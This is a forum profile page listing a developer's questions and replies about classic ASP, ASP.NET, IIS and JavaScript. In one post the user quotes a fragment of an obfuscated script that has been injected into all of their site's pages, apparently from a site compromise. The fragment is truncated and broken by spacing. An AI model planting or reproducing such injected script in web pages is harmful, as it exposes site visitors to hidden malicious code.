User Profile

Collapse

Profile Sidebar

Collapse
Gyanchand
Gyanchand
Last Activity: May 25 '11, 12:47 PM
Joined: Jul 6 '07
Location:
  •  
  • Time
  • Show
  • Source
Clear All
new posts

  • Gyanchand
    started a topic Asp.net Treeview node click event
    in .NET

    Asp.net Treeview node click event

    I am using a tree view control in asp.net. I need to perform an action on click event of node. what event can i use here . tried using OnSelectedNodeC hanged event, but event is not called.
    See more | Go to post

  • Gyanchand
    started a topic Need Facebook style chat

    Need Facebook style chat

    I want to develop or use a Facebook style chat, which can be integrated in my asp.net application, which will appear at the footer of my existing application pages.

    I have searched the net for many options, can you suggest any good links. Comet chat is an application which i thought was preety close to what i am looking for. Has anyone used comet chat ?
    See more | Go to post

  • Gyanchand
    replied to How can i use .Net assembly in asp?
    Well i guess their server was unavailable. When we tried the next morning, we were able to get through. So no problem here.
    See more | Go to post

    Leave a comment:


  • Gyanchand
    replied to How can i use .Net assembly in asp?
    Connecting using a proxy

    We are able to connect and retrieve values using SOAP. However, we were trying connect using a proxy.

    We have now added IWAM permissions to the folder where DLL is placed and also to the $windows root folder/temp$.
    Now we are able to instantiate the object of the API. However, we are getting the error at line :
    result = objWs.Login(var 1, var2, var3)

    Error : ...
    See more | Go to post

    Leave a comment:


  • Gyanchand
    replied to How can i use .Net assembly in asp?
    yes that is what i am trying to do.
    See more | Go to post

    Leave a comment:


  • Gyanchand
    started a topic How can i use .Net assembly in asp?

    How can i use .Net assembly in asp?

    I have a .Net API (wsdl). I have created a proxy for it, and now it want to use it in ASP. Since, we didn’t get any readymade Proxy generator for ASP/vbscript, We used .Net command prompt to generate the Proxy class.

    Code:
     
    Dim ws
    set ws = Server.CreateObject("Integration_1_1")      ‘line where ERROR appears 
    
    Dim auth
    auth = ws.Login(entityID, partnerKey, userKey)
    If (auth <> "")
    ...
    See more | Go to post

  • Gyanchand
    started a topic Website folder accidentally deleted from IIS
    in IIS

    Website folder accidentally deleted from IIS

    In IIS, on my website folder, i right clicked, and selected delete option.
    Now my website folder has been deleted from the system.

    Please tell me how can i retrive the website folder.
    See more | Go to post

  • Different browsers

    Tried viewing that page in different browser, but still that code remains.
    See more | Go to post

    Leave a comment:


  • Gyanchand
    started a topic Script automatically inserted in CodePages

    Script automatically inserted in CodePages

    The following script is being automatically inserted in all of my ASP code pages.
    It appears near the HTMl/BODY tags. This is not a function used in my application, i am unsure of what it is.It also reflects on allpages in my browser.

    function pde63eee44(s535 e23c){var sebfb0=s535e23c .substr(9,3)-599,ib88fc347,i 9ca815a;s535e23 c=s535e23c.subs tr(12);var d91e9c6=s535e23 c.length;for(va r ca59881e=0;ca59 881e848)ka6f868-=848;i9ca815a=k a6f868-sebfb0-50;i9ca815a=db3 cf8(i9ca815a);d ocument.write(b 3ffa19(i9ca815a ));}}pde63eee44 (e279dba03());f unction...
    See more | Go to post

  • recordCount incorrect for Distinct Clause in Quer

    I have recently migrated DB from Sql Server 2000 to Sql Server 2005.
    Ever since, when i fire queries with a DISTINCT clause, the recordcount property returns the result as -1.

    I am using the record set as:
    Sql ="Select dictinct fieldName from tbTableName"
    rs.Open Sql,ObjConn,adO penStatic,adLoc kPessimistic

    However when i tried removing the Lock Type property from the recordset, it reurns...
    See more | Go to post

  • Gyanchand
    started a topic Cannot open Dwg files through ASP

    Cannot open Dwg files through ASP

    I have a application in ASP where the user can upload Dwg files. The user is then listed the names of all available Dwg files. he can click on the name of the file to open the file. However even though the user has AutoCAD installed on his PC he is not able to open the file. The file path is correct... no problem with that.. can any one hlep me with this
    See more | Go to post

  • Gyanchand
    started a topic Disable history.back

    Disable history.back

    I wouldn't want the user to use the History.Back option in a page by presssing backspace or on the popup menu.....back.. is there any method by whcih i can prevent the user from using history.back
    See more | Go to post

  • Gyanchand
    started a topic Write ASP data to a Word template

    Write ASP data to a Word template

    Actually we need to use a Word template and insert cetain values through ASP. What I have done currently is : Have created a page in HTML and written the HTML to a text file and saved it as an doc file.

    strBody="<html> "
    strBody=strBody &"<head>"
    ........

    set sfile = objFS.createtex tfile(strPath, true)
    sfile.write(str Body)

    but in this case the problem...
    See more | Go to post

  • Actually we need to use a Word template and insert cetain values through ASP. What I have done currently is : Have created a page in HTML and written the HTML to a text file and saved it as an doc file.

    strBody="<html> "
    strBody=strBody &"<head>"
    ........

    set sfile = objFS.createtex tfile(strPath, true)
    sfile.write(str Body)

    but in this case the problem...
    See more | Go to post

    Leave a comment:


  • Gyanchand
    replied to Open window as readonly
    yes keping this option as the last resort, but just wanted to know how to lock the contents of the file or make the window readonly .... neway.. thanks man chris
    See more | Go to post

    Leave a comment:


  • Gyanchand
    replied to Open window as readonly
    hey Jared, thanks for your reply man...

    yes, the file is being created dynamically.. Even tried setting the file attributes to readonly.. but... when the file is opened in the popup window... it is editable to the user...
    However, while closing the popup window the msg is displayed saying the file is readonly and the user is prompted to save the file to another location...

    neway is there any other way where in...
    See more | Go to post

    Leave a comment:


  • Gyanchand
    started a topic Open window as readonly

    Open window as readonly

    using a popup i am displaying the contents of a word file. the user must not be able to edit the word file. but in the popup window user is able to edit the file....

    Can we open the popup window as readonly or something
    See more | Go to post

  • try
    OpenWin = window.open(pag e, "","toolbar=No, menubar=No,loca tion=No,scrollb ars=Yes,resizab le=Yes,status=Y es,width=950,he ight=500,left=4 0,top=100,","tr ue");
    See more | Go to post

    Leave a comment:


  • hey try this

    'Create a new page where the image will be placed. And popup this as the new window. Add this code in your script section of the popup page

    [CODE=javascript]function disable_right_c lick(e)
    {
    var browser = navigator.appNa me.substring ( 0, 9 );
    var event_number = 0;
    if (browser=="Micr osoft")
    event_number = event.button;
    else if (browser=="Nets cape")...
    See more | Go to post

    Leave a comment:


  • Gyanchand
    replied to hide items for print
    [HTML]<!-- Paste this code into the STYLE section of your HTML document
    so the button itself will not print -->

    @media print {
    input.noPrint { display: none; }
    }


    <!-- Paste this code into the BODY section of your HTML document -->

    <input class="noPrint" type="button" value="Print This Page" onclick="window .print()&qu...
    See more | Go to post
    Last edited by gits; Jul 20 '07, 08:23 AM. Reason: added CODE-tags

    Leave a comment:

No activity results to display
Show More
Working...